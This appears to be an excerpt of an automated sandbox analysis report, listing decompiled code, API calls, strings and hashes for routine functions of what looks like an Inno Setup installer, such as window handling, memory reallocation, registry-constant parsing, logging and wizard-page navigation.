Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 57f5aacb8be9df8ec01b5cf4f0681ac2cd2d26be38783226c89fa5c113ee3fb1
Instruction ID: edc66444bf91dbccd637f871198ccf20bfd66fdd9cc5066f76d2897232331e27
Opcode Fuzzy Hash: 57f5aacb8be9df8ec01b5cf4f0681ac2cd2d26be38783226c89fa5c113ee3fb1
Instruction Fuzzy Hash: CD018070E463445EF315BB699806B2D3B95D786B08F51887FF440A7AF2C77C68408B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00424458 Relevance: 6.0, APIs: 4, Instructions: 26
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00424458(void* __eax) {
				struct HWND__* _t4;
				void* _t6;
				struct HWND__* _t7;

				_t6 = __eax;
				_t4 =  *(__eax + 0x20);
				if(_t4 != 0) {
					_t4 = GetLastActivePopup(_t4);
					_t7 = _t4;
					if(_t7 != 0 && _t7 !=  *((intOrPtr*)(_t6 + 0x20))) {
						_t4 = IsWindowVisible(_t7);
						if(_t4 != 0) {
							_t4 = IsWindowEnabled(_t7);
							if(_t4 != 0) {
								return SetForegroundWindow(_t7);
							}
						}
					}
				}
				return _t4;
			}

0x0042445a
0x0042445c
0x00424461
0x00424464
0x00424469
0x0042446d
0x00424475
0x0042447c
0x0042447f
0x00424486
0x00000000
0x00424489
0x00424486
0x0042447c
0x0042446d
0x00424490

APIs

GetLastActivePopup.USER32(?), ref: 00424464
IsWindowVisible.USER32(?), ref: 00424475
IsWindowEnabled.USER32(?), ref: 0042447F
SetForegroundWindow.USER32(?,?,?,?,?,00485FC4,00000000,004866DC), ref: 00424489

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Window$ActiveEnabledForegroundLastPopupVisible
String ID:
API String ID: 2280970139-0
Opcode ID: 7a5af007174fff9b1595ee6131d885b23851cbf0eb5bd71a3a54e8eec36cf7cb
Instruction ID: 7619e3bee271c6ada74d7ecb7122e895dc1e33f6cb89b075b848939e61871245
Opcode Fuzzy Hash: 7a5af007174fff9b1595ee6131d885b23851cbf0eb5bd71a3a54e8eec36cf7cb
Instruction Fuzzy Hash: 67E08C61702639178A2177762D81B9B01CC8D453A436A4277BC00FBA83DA2CDC1081AE

Uniqueness

Uniqueness Score: -1.00%

Function 0040638C Relevance: 6.0, APIs: 4, Instructions: 11
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040638C(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}

0x0040638f
0x00406396
0x0040639b
0x004063a1
0x004063a6

APIs

GlobalHandle.KERNEL32 ref: 0040638F
GlobalUnWire.KERNEL32(00000000), ref: 00406396
GlobalReAlloc.KERNEL32 ref: 0040639B
GlobalFix.KERNEL32(00000000), ref: 004063A1

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Global$AllocHandleWire
String ID:
API String ID: 2210401237-0
Opcode ID: 2ccb1316f656a9feec663ea7d40f446e50994104d6d7ba694866cbb55bb477a3
Instruction ID: a85f6cc49554111a6b442965616aab6ca95b327fc93131f70674e99c7dd58da5
Opcode Fuzzy Hash: 2ccb1316f656a9feec663ea7d40f446e50994104d6d7ba694866cbb55bb477a3
Instruction Fuzzy Hash: A8B009E4811A0078EE0833F26C0FC3F287DDC9470C780496E7444BA483987DBC00883E

Uniqueness

Uniqueness Score: -1.00%

Function 00463DE4 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 247
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00463DE4(intOrPtr __eax, void* __ecx, intOrPtr __edx, void* __eflags, void* __fp0) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t130;
				intOrPtr _t150;
				intOrPtr _t172;
				void* _t182;
				void* _t209;
				void* _t214;
				void* _t215;
				int _t216;
				void* _t218;
				int _t230;
				intOrPtr _t234;
				intOrPtr _t235;
				intOrPtr _t236;
				intOrPtr _t239;
				intOrPtr _t240;
				intOrPtr _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				intOrPtr _t246;
				intOrPtr _t247;
				signed int _t248;
				void* _t257;
				intOrPtr _t260;
				void* _t281;

				_t281 = __fp0;
				_t218 = __ecx;
				_t256 = __edx;
				_v8 = __eax;
				_t258 = E004626C0(_v8, _t214, __edx, __edx, _t257);
				_t215 = E0040B654( *((intOrPtr*)(_v8 + 0x2ec)), _t95);
				 *((intOrPtr*)(_v8 + 0x340)) = __edx;
				_t100 =  *((intOrPtr*)(_t215 + 0x28));
				if( *((intOrPtr*)(_t215 + 0x28)) != 0) {
					E0045EF64( *((intOrPtr*)(_v8 + 0x1c4)), _t218, _t100);
				}
				E0045EF64( *((intOrPtr*)(_v8 + 0x1c0)), _t218,  *((intOrPtr*)(_t215 + 0x24)));
				E00460C98(_t215);
				if( *0x48db8c == 0) {
					L5:
					_t230 = 0;
					goto L7;
				} else {
					_t209 =  *((intOrPtr*)(_v8 + 0x340)) - 1;
					if(_t209 == 0 || _t209 == 0xd) {
						goto L5;
					} else {
						_t230 = 1;
						L7:
						E00414C5C( *((intOrPtr*)(_v8 + 0x280)), _t218, _t230, _t256);
						if(( *(_t215 + 0x5c) & 0x00000002) != 0) {
							E00414C5C( *((intOrPtr*)(_v8 + 0x1bc)), _t218, 0, _t256);
							E00414C5C( *((intOrPtr*)(_v8 + 0x1b8)), _t218, 0, _t256);
							_t233 = 0;
							__eflags = 0;
							E00414C5C( *((intOrPtr*)(_v8 + 0x1b4)), _t218, 0, _t256);
						} else {
							_t172 = _v8;
							_t267 =  *((intOrPtr*)(_t172 + 0x340)) - 0xc;
							if( *((intOrPtr*)(_t172 + 0x340)) == 0xc || E00463D98(_v8, _t267) + 1 == 0) {
								_t248 = 0;
							} else {
								_t248 = 1;
							}
							E00414C5C( *((intOrPtr*)(_v8 + 0x1bc)), _t218, _t248, _t256);
							E00414C5C( *((intOrPtr*)(_v8 + 0x1b8)), _t218, _t248 & 0xffffff00 |  *((intOrPtr*)(_v8 + 0x340)) != 0x0000000c, _t256);
							_t182 =  *((intOrPtr*)(_v8 + 0x340)) - 2;
							if(_t182 == 0) {
								E00414C98( *((intOrPtr*)(_v8 + 0x1b8)),  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2a0)) + 0x101)));
							} else {
								if(_t182 == 9) {
									E00414C98( *((intOrPtr*)(_v8 + 0x1b8)), 0);
								} else {
									E00414C98( *((intOrPtr*)(_v8 + 0x1b8)), 1);
								}
							}
							E00414C5C( *((intOrPtr*)(_v8 + 0x1b4)), _t218, 0 | _t258 - E004626C0(_v8, _t215, 0xc, _t256, _t258) <= 0x00000000, _t256);
							if( *((intOrPtr*)(_v8 + 0x340)) != 0xc || ( *0x4ae180 & 0x00000020) != 0 &&  *0x4adfc0 == 0) {
								_t233 = 1;
							} else {
								_t233 = 0;
							}
							E00414C98( *((intOrPtr*)(_v8 + 0x1b4)), _t233);
						}
						if(E00418368( *((intOrPtr*)(_v8 + 0x1b4)), _t233) == 0) {
							_t216 = 1;
						} else {
							_t216 = 0;
						}
						_t217 = _t216;
						EnableMenuItem(GetSystemMenu(E004183F8(_v8), 0), 0xf060, _t216);
						_t234 =  *0x48db98; // 0x21e9074
						E00414D30( *((intOrPtr*)(_v8 + 0x1bc)), _t216, _t234, _t256, _t258);
						_t130 =  *((intOrPtr*)(_v8 + 0x340)) - 0xa;
						if(_t130 == 0) {
							_t235 =  *0x48dba8; // 0x21e90c8
							E00414D30( *((intOrPtr*)(_v8 + 0x1b8)), _t217, _t235, _t256, _t258);
							_t236 =  *0x48dba0; // 0x21e90a0
							E00414D30( *((intOrPtr*)(_v8 + 0x1b4)), _t217, _t236, _t256, _t258);
						} else {
							if(_t130 == 4) {
								_t244 =  *0x48dba4; // 0x21e90b4
								E00414D30( *((intOrPtr*)(_v8 + 0x1b8)), _t217, _t244, _t256, _t258);
								_t245 =  *0x48dba0; // 0x21e90a0
								E00414D30( *((intOrPtr*)(_v8 + 0x1b4)), _t217, _t245, _t256, _t258);
							} else {
								_t246 =  *0x48dbb0; // 0x21e9100
								E00414D30( *((intOrPtr*)(_v8 + 0x1b8)), _t217, _t246, _t256, _t258);
								_t247 =  *0x48dba0; // 0x21e90a0
								E00414D30( *((intOrPtr*)(_v8 + 0x1b4)), _t217, _t247, _t256, _t258);
							}
						}
						E00463D38(_v8, _t256);
						if( *((intOrPtr*)(_v8 + 0x340)) == 5) {
							_push(0x4640c5);
							_push( *[fs:eax]);
							 *[fs:eax] = _t260;
							E00414C98( *((intOrPtr*)(_v8 + 0x1b8)), E0046075C(_v8, _t217, _t256, _t258, _t281));
							_pop(_t243);
							 *[fs:eax] = _t243;
						}
						_push(_t259);
						_push(0x46411a);
						_push( *[fs:eax]);
						 *[fs:eax] = _t260;
						 *((intOrPtr*)( *((intOrPtr*)(E00462784(_v8,  *((intOrPtr*)(_v8 + 0x340)), _t256))) + 0x28))();
						_pop(_t239);
						 *[fs:eax] = _t239;
						_push(_t259);
						_push(0x464178);
						_push( *[fs:eax]);
						 *[fs:eax] = _t260;
						_t280 =  *0x4ae298;
						if( *0x4ae298 != 0) {
							_v16 =  *((intOrPtr*)(_v8 + 0x340));
							_v12 = 0;
							_t150 =  *0x4ae298; // 0x21fdcf0
							E00487508(_t150,  &_v16, "CurPageChanged", _t280, _t281, 0, 0);
						}
						_pop(_t240);
						 *[fs:eax] = _t240;
						return 0;
					}
				}
			}

0x00463de4
0x00463de4
0x00463ded
0x00463def
0x00463dfc
0x00463e0e
0x00463e13
0x00463e19
0x00463e1e
0x00463e2b
0x00463e2b
0x00463e3c
0x00463e43
0x00463e4f
0x00463e64
0x00463e64
0x00000000
0x00463e51
0x00463e5a
0x00463e5d
0x00000000
0x00463e68
0x00463e68
0x00463e6a
0x00463e73
0x00463e7c
0x00463f7d
0x00463f8d
0x00463f92
0x00463f92
0x00463f9d
0x00463e82
0x00463e82
0x00463e85
0x00463e8c
0x00463e99
0x00463e9d
0x00463e9d
0x00463e9d
0x00463ea8
0x00463ec3
0x00463ed1
0x00463ed4
0x00463ef5
0x00463ed6
0x00463ed9
0x00463f07
0x00463edb
0x00463f19
0x00463f19
0x00463ed9
0x00463f39
0x00463f48
0x00463f60
0x00463f5c
0x00463f5c
0x00463f5c
0x00463f6b
0x00463f6b
0x00463fb2
0x00463fb8
0x00463fb4
0x00463fb4
0x00463fb4
0x00463fbd
0x00463fd7
0x00463fdc
0x00463feb
0x00463ff9
0x00463ffc
0x00464005
0x00464014
0x00464019
0x00464028
0x00463ffe
0x00464001
0x0046402f
0x0046403e
0x00464043
0x00464052
0x00464003
0x00464059
0x00464068
0x0046406d
0x0046407c
0x0046407c
0x00464001
0x00464084
0x00464093
0x00464098
0x0046409d
0x004640a0
0x004640b6
0x004640bd
0x004640c0
0x004640c0
0x004640ee
0x004640ef
0x004640f4
0x004640f7
0x0046410d
0x00464112
0x00464115
0x00464133
0x00464134
0x00464139
0x0046413c
0x0046413f
0x00464146
0x00464155
0x00464158
0x00464164
0x00464169
0x00464169
0x00464170
0x00464173
0x00000000
0x00464173
0x00463e5d

APIs

GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 00463FD1
EnableMenuItem.USER32 ref: 00463FD7

Strings

CurPageChanged, xrefs: 0046415F

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Menu$EnableItemSystem
String ID: CurPageChanged
API String ID: 3692539535-2490978513
Opcode ID: c938ea6e3de9c821c2a92deed243876a5f3356c951b1779cff734310c62aab9d
Instruction ID: 0d8d21519d013d293257eb644842f686bf5c51bebf2a0438a93b3d35f932186e
Opcode Fuzzy Hash: c938ea6e3de9c821c2a92deed243876a5f3356c951b1779cff734310c62aab9d
Instruction Fuzzy Hash: FFA14934B00244EFCB05DF69D585AAE73F5AF89304F2641B6F8049B362E739AE41DB49

Uniqueness

Uniqueness Score: -1.00%

Function 0046FA68 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210
registryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0046FA68(char __eax, intOrPtr* __ebx, intOrPtr __edx, char __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v29;
				intOrPtr _v36;
				void* _v40;
				char _v44;
				char _t104;
				char _t164;
				char _t165;
				void* _t174;
				intOrPtr _t194;
				void* _t217;
				void* _t218;
				void* _t222;
				void* _t236;
				void* _t240;

				_t215 = __edi;
				_t173 = __ebx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v44 = 0;
				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E00403870(_v8);
				_push(_t222);
				_push(0x46fd05);
				_push( *[fs:eax]);
				 *[fs:eax] = _t222 + 0xffffffd8;
				E00403900( &_v8, 4, 1);
				_t217 = E0042D7FC(0x5c, 4, _v8);
				if(_t217 == 0) {
					L24:
					E00451AFC("Failed to parse \"reg\" constant", _t173, _t215, _t217, _t236);
					L25:
					_pop(_t194);
					 *[fs:eax] = _t194;
					_push(E0046FD0C);
					E00403548( &_v44);
					E00403568( &_v28, 4);
					return E00403548( &_v8);
				}
				E004038C0(_v8, _t217 - 1, 1,  &_v16);
				if(_v16 == 0) {
					goto L24;
				} else {
					_t104 =  *0x48cb0c; // 0x1
					_v29 = _t104;
					_t174 = E004036BC(_v16);
					if(_t174 >= 2) {
						if( *((char*)(_v16 + _t174 - 2)) != 0x33 ||  *((char*)(_v16 + _t174 - 1)) != 0x32) {
							_t164 = _v16;
							__eflags =  *((char*)(_t164 + _t174 - 2)) - 0x36;
							if( *((char*)(_t164 + _t174 - 2)) == 0x36) {
								_t165 = _v16;
								__eflags =  *((char*)(_t165 + _t174 - 1)) - 0x34;
								if( *((char*)(_t165 + _t174 - 1)) == 0x34) {
									__eflags =  *0x4ae250;
									if(__eflags == 0) {
										E00451AFC("Cannot access a 64-bit key in a \"reg\" constant on this version of Windows", _t174, _t215, _t217, __eflags);
									}
									_v29 = 2;
									__eflags = _t174 - 2;
									E004039EC( &_v16, _t174 - 2);
								}
							}
						} else {
							_v29 = 1;
							E004039EC( &_v16, _t174 - 2);
						}
					}
					_v36 = 0;
					_t215 = 5;
					_t173 = 0x48cb14;
					while(E00406B28( *_t173, _v16) != 0) {
						_t173 = _t173 + 8;
						_t215 = _t215 - 1;
						__eflags = _t215;
						if(__eflags != 0) {
							continue;
						}
						L15:
						if(_v36 == 0) {
							goto L24;
						}
						_t38 = _t217 + 1; // 0x1
						E004038C0(_v8, 0x7fffffff, _t38,  &_v16);
						_t218 = E0042D7FC(0x7c, 0x7fffffff, _v16);
						if(_t218 == 0) {
							_t218 = E004036BC(_v16) + 1;
						}
						_t43 = _t218 + 1; // 0x2
						E004038C0(_v16, 0x7fffffff, _t43,  &_v28);
						E004039EC( &_v16, _t218 - 1);
						_t217 = E0042D7FC(0x2c, 0x7fffffff, _v16);
						if(_t217 == 0) {
							goto L24;
						} else {
							E004038C0(_v16, _t217 - 1, 1,  &_v20);
							_t50 = _t217 + 1; // 0x1
							E004038C0(_v16, 0x7fffffff, _t50,  &_v24);
							E0042D6F8( &_v20, _t173, _t215, _t217);
							_t236 = 0x2c;
							if(0x2c == 0) {
								goto L24;
							}
							E0042D6F8( &_v24, _t173, _t215, _t217);
							_t236 = 0x2c;
							if(0x2c == 0 || E0042D6F8( &_v28, _t173, _t215, _t217) == 0) {
								goto L24;
							} else {
								E00471818(_v28, _t173,  *((intOrPtr*)(_a4 - 8)),  *((intOrPtr*)(_a4 - 4)), _t215, _t217, _t240, _v12);
								E00471818(_v20, _t173,  *((intOrPtr*)(_a4 - 8)),  *((intOrPtr*)(_a4 - 4)), _t215, _t217, _t240,  &_v44);
								if(E0042DD88(_v29, E00403880(_v44), _v36,  &_v40, 1, 0) == 0) {
									E00471818(_v24, _t173,  *((intOrPtr*)(_a4 - 8)),  *((intOrPtr*)(_a4 - 4)), _t215, _t217, _t240,  &_v44);
									E00403880(_v44);
									E0042DCB8();
									RegCloseKey(_v40);
								}
								goto L25;
							}
						}
					}
					_t34 = _t173 + 4; // 0x80000000
					_v36 =  *_t34;
					goto L15;
				}
			}

0x0046fa68
0x0046fa68
0x0046fa6e
0x0046fa6f
0x0046fa70
0x0046fa73
0x0046fa76
0x0046fa79
0x0046fa7c
0x0046fa7f
0x0046fa82
0x0046fa85
0x0046fa8b
0x0046fa92
0x0046fa93
0x0046fa98
0x0046fa9b
0x0046faab
0x0046faba
0x0046fabe
0x0046fcd0
0x0046fcd5
0x0046fcda
0x0046fcdc
0x0046fcdf
0x0046fce2
0x0046fcea
0x0046fcf7
0x0046fd04
0x0046fd04
0x0046fad3
0x0046fadc
0x00000000
0x0046fae2
0x0046fae2
0x0046fae7
0x0046faf2
0x0046faf7
0x0046fb01
0x0046fb20
0x0046fb23
0x0046fb28
0x0046fb2a
0x0046fb2d
0x0046fb32
0x0046fb34
0x0046fb3b
0x0046fb42
0x0046fb42
0x0046fb47
0x0046fb4d
0x0046fb53
0x0046fb53
0x0046fb32
0x0046fb0d
0x0046fb0d
0x0046fb19
0x0046fb19
0x0046fb01
0x0046fb5a
0x0046fb5d
0x0046fb62
0x0046fb67
0x0046fb7d
0x0046fb80
0x0046fb80
0x0046fb81
0x00000000
0x00000000
0x0046fb83
0x0046fb87
0x00000000
0x00000000
0x0046fb91
0x0046fb9c
0x0046fbab
0x0046fbaf
0x0046fbbb
0x0046fbbb
0x0046fbc0
0x0046fbcb
0x0046fbd6
0x0046fbe5
0x0046fbe9
0x00000000
0x0046fbef
0x0046fbfe
0x0046fc07
0x0046fc12
0x0046fc1a
0x0046fc1f
0x0046fc21
0x00000000
0x00000000
0x0046fc2a
0x0046fc2f
0x0046fc31
0x00000000
0x0046fc47
0x0046fc5a
0x0046fc7a
0x0046fc96
0x0046fcab
0x0046fcb3
0x0046fcc0
0x0046fcc9
0x0046fcc9
0x00000000
0x0046fc96
0x0046fc31
0x0046fbe9
0x0046fb75
0x0046fb78
0x00000000
0x0046fb78

APIs

RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047121F,?,00000000,00000000,00000001,00000000,0046FD05,?,00000000), ref: 0046FCC9

Strings

Failed to parse "reg" constant, xrefs: 0046FCD0
Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0046FB3D

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Close
String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
API String ID: 3535843008-1938159461
Opcode ID: 3de25c626543f3d794d275ebe9d0983061f9d9b8cc766ddb64318c591b9b6a09
Instruction ID: 5325d3ab1ff744eab611d78bb8042643efe848bd449e6a460418d48f1ed742bf
Opcode Fuzzy Hash: 3de25c626543f3d794d275ebe9d0983061f9d9b8cc766ddb64318c591b9b6a09
Instruction Fuzzy Hash: 83813275E001089FCB10EF99D481ADEB7F9EF48354F1081BAE854A7395D738AE09CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00455814 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107
timeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00455814(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct _SYSTEMTIME _v24;
				char _v28;
				char _v32;
				signed int _v36;
				char _v40;
				signed int _v44;
				char _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				char _v64;
				signed int _v68;
				char _v72;
				signed int _v76;
				void* _t68;
				intOrPtr _t70;
				intOrPtr _t74;
				void* _t79;
				intOrPtr _t92;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t102;
				void* _t103;
				intOrPtr _t104;

				_t102 = _t103;
				_t104 = _t103 + 0xffffffb8;
				_v28 = 0;
				_v8 = __eax;
				_push(_t102);
				_push(0x45599b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t104;
				if( *0x48df04 != 0) {
					GetLocalTime( &_v24);
					_push(_t102);
					_push(0x45593e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t104;
					_v76 = _v24.wYear & 0x0000ffff;
					_v72 = 0;
					_v68 = _v24.wMonth & 0x0000ffff;
					_v64 = 0;
					_v60 = _v24.wDay & 0x0000ffff;
					_v56 = 0;
					_v52 = _v24.wHour & 0x0000ffff;
					_v48 = 0;
					_v44 = _v24.wMinute & 0x0000ffff;
					_v40 = 0;
					_v36 = _v24.wSecond & 0x0000ffff;
					_v32 = 0;
					E00407B08("%.4u-%.2u-%.2u %.2u:%.2u:%.2u   ", 5,  &_v76,  &_v28);
					E004557F8(_v28);
					_t98 = 1;
					_t100 = E004036BC(_v8);
					if(_t100 > 0) {
						_t79 = 1;
						do {
							if( *((char*)(_v8 + _t79 - 1)) == 0xa) {
								_t31 = _t98 - 1; // 0x455fd9
								_t74 =  *0x48df04; // 0x0
								E0045023C(_t74, _t79 - _t98 + 1, _v8 + _t31, _t102);
								_t32 = _t79 + 1; // 0x2
								_t98 = _t32;
								E004557F8("                      ");
							}
							_t79 = _t79 + 1;
							_t100 = _t100 - 1;
						} while (_t100 != 0);
					}
					if(_t98 <= E004036BC(_v8)) {
						_t68 = E004036BC(_v8);
						_t37 = _t98 - 1; // 0x455fd9
						_t70 =  *0x48df04; // 0x0
						E0045023C(_t70, _t68 - _t98 + 1, _v8 + _t37, _t102);
					}
					E004557F8(0x455a00);
					_pop(_t94);
					 *[fs:eax] = _t94;
				}
				if( *0x48deec != 0) {
					E004551AC(_v8);
				}
				_pop(_t92);
				 *[fs:eax] = _t92;
				_push(E004559A2);
				return E00403548( &_v28);
			}

0x00455815
0x00455817
0x0045581f
0x00455822
0x00455827
0x00455828
0x0045582d
0x00455830
0x0045583a
0x00455844
0x0045584b
0x0045584c
0x00455851
0x00455854
0x0045585f
0x00455862
0x0045586a
0x0045586d
0x00455875
0x00455878
0x00455880
0x00455883
0x0045588b
0x0045588e
0x00455896
0x00455899
0x004558aa
0x004558b2
0x004558b7
0x004558c4
0x004558c8
0x004558ca
0x004558cf
0x004558d7
0x004558e1
0x004558e5
0x004558ea
0x004558ef
0x004558ef
0x004558f7
0x004558f7
0x004558fc
0x004558fd
0x004558fd
0x004558cf
0x0045590a
0x0045590f
0x0045591c
0x00455920
0x00455925
0x00455925
0x0045592f
0x00455936
0x00455939
0x00455939
0x0045597b
0x00455980
0x00455980
0x00455987
0x0045598a
0x0045598d
0x0045599a

APIs

GetLocalTime.KERNEL32(?,00000000,0045599B,?,?,0048DF10,00000000), ref: 00455844

Part of subcall function 0045023C: WriteFile.KERNEL32(?,?,00000000,00450496,00000000,00000000,?,?,?,00450496,00000000,00452595,?,0048B23D,00000000,00452636), ref: 00450253

Strings

%.4u-%.2u-%.2u %.2u:%.2u:%.2u , xrefs: 004558A5
, xrefs: 004558F2

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: FileLocalTimeWrite
String ID: $%.4u-%.2u-%.2u %.2u:%.2u:%.2u
API String ID: 1093383541-3002923774
Opcode ID: c703622674bd0c113761a597bc2c5e92d2a5121707254f1c2db8fe7444bd7fbd
Instruction ID: 2327f4e4ef2f4ef7558c0ed526d5bd000cce1192059452b37d88c10740b68000
Opcode Fuzzy Hash: c703622674bd0c113761a597bc2c5e92d2a5121707254f1c2db8fe7444bd7fbd
Instruction Fuzzy Hash: 8B418CB0D04648DFDB11DBA9C8617BEBBF4EB09315F50056AF804A7292D73D9E48CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004658B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004658B0(intOrPtr __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				void* _t30;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t65;
				void* _t70;
				void* _t71;
				intOrPtr _t72;

				_t68 = __esi;
				_t67 = __edi;
				_t60 = __ecx;
				_t59 = __ebx;
				_t70 = _t71;
				_t72 = _t71 + 0xfffffff4;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t64 = 0;
				_v16 = 0;
				_v8 = __eax;
				_push(_t70);
				_push(0x4659f9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t72;
				L1:
				while(1) {
					do {
						if( *((intOrPtr*)(_v8 + 0x340)) == 0xb) {
							E004603D4(0x78,  &_v16);
							_t60 = 3;
							_t64 = 0;
							E00473BCC(_v16, _t59, 3, 0, _t67, _t68, 1, 1, 0);
							E00408DC4();
						}
						_v12 =  *((intOrPtr*)(_v8 + 0x340));
						_push(_t70);
						_push(0x465944);
						_push( *[fs:eax]);
						 *[fs:eax] = _t72;
						_t30 = E00418368( *((intOrPtr*)(_v8 + 0x1b8)), _t64);
						_t76 = _t30;
						if(_t30 != 0) {
							_t59 = 0xfff5;
							E00402D48( *((intOrPtr*)(_v8 + 0x1b8)), 0xfff5, _t60, _t76);
						}
						_pop(_t64);
						_pop(_t60);
						 *[fs:eax] = _t64;
						if( *((char*)(_v8 + 0x33c)) == 0) {
							goto L7;
						}
						L11:
						__eflags = 0;
						_pop(_t65);
						 *[fs:eax] = _t65;
						_push(E00465A00);
						return E00403548( &_v16);
						L7:
					} while ( *((intOrPtr*)(_v8 + 0x340)) != _v12);
					if( *((char*)( *0x4adf90 + 0x1b6)) > 1) {
						E00455814("Failed to proceed to next wizard page; showing wizard.", _t59, _t67, _t68);
						E00473350(1);
						_t43 =  *0x48d628; // 0x21d2410
						E004243F4(_t43);
						_t45 =  *0x48d628; // 0x21d2410
						SetActiveWindow( *(_t45 + 0x20));
						E0042301C( *0x4adf64);
					} else {
						E00455814("Failed to proceed to next wizard page; aborting.", _t59, _t67, _t68);
						E00408DC4();
						continue;
					}
					goto L11;
				}
			}

0x004658b0
0x004658b0
0x004658b0
0x004658b0
0x004658b1
0x004658b3
0x004658b6
0x004658b7
0x004658b8
0x004658b9
0x004658bb
0x004658be
0x004658c3
0x004658c4
0x004658c9
0x004658cc
0x00000000
0x004658cf
0x004658cf
0x004658d9
0x004658e6
0x004658ee
0x004658f0
0x004658f2
0x004658f7
0x004658f7
0x00465905
0x0046590a
0x0046590b
0x00465910
0x00465913
0x0046591f
0x00465924
0x00465926
0x00465931
